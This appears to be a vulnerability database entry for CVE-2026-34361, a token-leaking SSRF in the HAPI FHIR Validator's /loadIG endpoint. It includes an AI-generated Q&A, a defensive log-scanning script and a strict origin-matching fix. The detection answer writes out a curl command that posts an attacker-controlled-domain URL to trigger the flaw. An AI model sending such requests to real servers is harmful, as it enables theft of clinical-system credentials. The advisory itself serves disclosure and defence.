CVE-2026-34361
Unauthenticated SSRF and Token Theft in HAPI FHIR Validator
Publication date: 2026-03-31
Last updated on: 2026-04-03
Assigner: GitHub, Inc.
Description
CVSS Scores
EPSS Scores
| Metric | Value |
|---|---|
| Probability | |
| Percentile | |
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| hapifhir | hl7_fhir_core | to 6.9.4 (exc) |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-552 | The product makes files or directories accessible to unauthorized actors, even though they should not be. |
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?
CVE-2026-34361 is a critical unauthenticated Server-Side Request Forgery (SSRF) vulnerability in the HAPI FHIR Validator HTTP service, specifically via the /loadIG endpoint in versions prior to 6.9.4.
The /loadIG endpoint accepts unauthenticated POST requests containing a JSON body with an "ig" field. If this field contains an HTTP(S) URL, the service makes an outbound GET request to that URL.
A flaw in the credential provider uses a startsWith() string comparison to decide if authentication credentials (Bearer tokens, Basic auth, API keys) should be attached to outbound requests. This allows an attacker to register a domain that prefix-matches a legitimate configured server URL and steal authentication tokens intended for that legitimate server.
Additionally, the HTTP client follows redirects without properly disabling credential re-evaluation, enabling redirect amplification attacks where credentials can be leaked through indirect redirect chains.
This vulnerability enables attackers to steal sensitive authentication credentials and potentially publish malicious FHIR packages or cause data breaches.
How can this vulnerability impact me?
This vulnerability can lead to theft of sensitive authentication tokens such as Bearer tokens, Basic authentication credentials, and API keys configured for legitimate FHIR servers.
Attackers can use stolen credentials to perform supply chain attacks by publishing malicious FHIR packages, potentially compromising downstream systems.
It can also result in data breaches exposing protected clinical data, impacting confidentiality.
The vulnerability has a high severity with a CVSS score of 9.3, indicating critical impact with no required privileges or user interaction.
How can this vulnerability be detected on my network or system? Can you suggest some commands?
This vulnerability can be detected by monitoring for unauthenticated POST requests to the /loadIG endpoint of the FHIR Validator HTTP service, especially those containing JSON bodies with an "ig" field set to HTTP(S) URLs.
Network detection can focus on outbound HTTP GET requests initiated by the service to attacker-controlled or unexpected domains that prefix-match legitimate configured server URLs.
Suggested commands include using network monitoring tools or packet capture utilities to filter for POST requests to /loadIG and outbound HTTP requests from the service.
- Using curl to test the endpoint: curl -X POST http://<FHIR-validator-host>/loadIG -H "Content-Type: application/json" -d '{"ig":"http://attacker-controlled-domain.com"}'
- Using tcpdump or Wireshark to capture outbound HTTP requests from the FHIR Validator server to suspicious domains.
- Checking server logs for unauthenticated POST requests to /loadIG with unusual or external URLs in the "ig" field.
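The log check described in the answer above, as an added illustration that is not part of the CVE record or of the HAPI FHIR project: it scans constructed request-log lines for POST requests to /loadIG whose "ig" field is an HTTP(S) URL outside an allowlist of the package hosts named elsewhere on this page. The log line format (method, path, JSON body) is an assumption; real validator logs will differ and the parser would need adapting.

```python
"""Flag /loadIG requests whose "ig" field points at an unexpected host.

Added example, not HAPI FHIR code. Log format below is an assumption.
"""
import json
import re
from typing import List, Optional
from urllib.parse import urlsplit

# Hosts the validator legitimately fetches packages from (from the advisory text).
ALLOWED_HOSTS = {"packages.fhir.org", "packages2.fhir.org", "build.fhir.org"}

# Constructed sample log lines: "<METHOD> <PATH> <JSON body>".
SAMPLE_LOG = [
    'POST /loadIG {"ig":"hl7.fhir.us.core#6.1.0"}',
    'POST /loadIG {"ig":"https://packages.fhir.org/hl7.fhir.us.core/6.1.0"}',
    'POST /loadIG {"ig":"http://203.0.113.10/collect"}',
    'POST /loadIG {"ig":"https://packages.fhir.org.example.net/pkg"}',
    'POST /validate {"resource":"Patient"}',
    'GET /loadIG',
]

LINE_RE = re.compile(r"^(\S+) (\S+)(?: (.*))?$")


def ig_url_host(body: str) -> Optional[str]:
    """Return the hostname of the "ig" field if it is an http(s) URL, else None.

    Package identifiers such as "hl7.fhir.us.core#6.1.0" are not URLs and
    produce no outbound fetch, so they return None.
    """
    try:
        ig = json.loads(body).get("ig", "")
    except (ValueError, AttributeError):
        return None
    if not isinstance(ig, str):
        return None
    parts = urlsplit(ig)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return None
    # urlsplit strips any userinfo, so "https://a@b/" yields hostname "b".
    return parts.hostname.lower()


def is_suspicious(line: str) -> bool:
    """True for POST /loadIG lines whose ig URL host is not allowlisted."""
    m = LINE_RE.match(line)
    if not m:
        return False
    method, path, body = m.group(1), m.group(2), m.group(3) or ""
    if method != "POST" or path.split("?")[0] != "/loadIG":
        return False
    host = ig_url_host(body)
    # Exact host comparison: a prefix-looking host like
    # packages.fhir.org.example.net must not pass.
    return host is not None and host not in ALLOWED_HOSTS


def flag_lines(lines: List[str]) -> List[str]:
    """Return the subset of log lines that warrant investigation."""
    return [ln for ln in lines if is_suspicious(ln)]


if __name__ == "__main__":
    for hit in flag_lines(SAMPLE_LOG):
        print("SUSPICIOUS:", hit)
```

The allowlist is compared on the exact hostname, so a host that merely begins with a legitimate name is still flagged; pair this with the outbound egress allowlisting the mitigation answer recommends, since the log check only sees what the service was asked to fetch, not what it actually fetched after redirects.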
What immediate steps should I take to mitigate this vulnerability?
Immediate mitigation steps include upgrading the HAPI FHIR Validator component to version 6.9.4 or later, where the vulnerability has been patched.
If upgrading is not immediately possible, restrict access to the /loadIG endpoint to trusted users or networks to prevent unauthenticated requests.
Implement network-level controls such as firewall rules or proxy allowlisting to restrict outbound HTTP requests from the FHIR Validator service to only trusted hosts (e.g., packages.fhir.org, packages2.fhir.org, build.fhir.org).
Review and update the credential provider logic to avoid using startsWith() prefix matching for URL credential attachment, ensuring strict URL origin matching.
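The prefix-matching flaw described in the explanation above and the strict origin matching this mitigation step calls for, side by side as an added example; this is illustrative Python, not the HAPI FHIR credential provider or its API. The configured server URL, the placeholder token and the redirect helper are all constructed for the example.

```python
"""Credential attachment: startsWith() prefix matching vs. strict origin matching.

Added illustration, not HAPI FHIR code. CONFIGURED_SERVERS and the token
value are constructed placeholders.
"""
from typing import Dict, Optional, Tuple
from urllib.parse import urlsplit

# Constructed configuration: server URL -> credential to send to that server.
CONFIGURED_SERVERS: Dict[str, str] = {
    "https://packages.fhir.org": "Bearer EXAMPLE-TOKEN-PLACEHOLDER",
}

Origin = Tuple[str, str, int]


def credentials_by_prefix(url: str) -> Optional[str]:
    """The flawed decision: attach credentials whenever the request URL string
    begins with a configured server URL (the startsWith() pattern)."""
    for server_url, token in CONFIGURED_SERVERS.items():
        if url.startswith(server_url):
            return token
    return None


def origin(url: str) -> Optional[Origin]:
    """Parse (scheme, host, port) with default ports filled in, or None if the
    URL is not a well-formed http(s) URL."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return None
    try:
        port = parts.port or (443 if parts.scheme == "https" else 80)
    except ValueError:  # non-numeric port
        return None
    return (parts.scheme, parts.hostname.lower(), port)


def credentials_by_origin(url: str) -> Optional[str]:
    """The hardened decision: attach credentials only when scheme, host and
    port of the request URL equal those of a configured server."""
    target = origin(url)
    if target is None:
        return None
    for server_url, token in CONFIGURED_SERVERS.items():
        if origin(server_url) == target:
            return token
    return None


def credentials_for_redirect(original_url: str, redirect_url: str) -> Optional[str]:
    """Decide credentials for a redirect target without re-running the lookup
    blindly: only a same-origin hop keeps the original request's credentials."""
    if origin(redirect_url) != origin(original_url):
        return None
    return credentials_by_origin(redirect_url)


if __name__ == "__main__":
    lookalike = "https://packages.fhir.org.example.net/pkg"
    print("prefix match leaks:", credentials_by_prefix(lookalike) is not None)
    print("origin match leaks:", credentials_by_origin(lookalike) is not None)
```

The origin comparison also covers the userinfo trick (`https://packages.fhir.org@other.example/`), which `startsWith()` accepts but whose parsed host is `other.example`, and it refuses to send an HTTPS credential over plain HTTP to the same host. The redirect helper makes the cross-origin case explicit rather than re-evaluating credentials for every hop, which is the redirect amplification the explanation describes.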
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?
This vulnerability allows attackers to steal authentication tokens (Bearer, Basic, API keys) configured for legitimate FHIR servers, which can lead to unauthorized access to protected clinical data.
The theft of sensitive authentication credentials and potential exposure of protected clinical data can result in violations of data protection regulations such as GDPR and HIPAA, which mandate strict controls over personal and health information.
By enabling supply chain attacks and unauthorized data access, this vulnerability undermines the confidentiality and security requirements essential for compliance with these standards.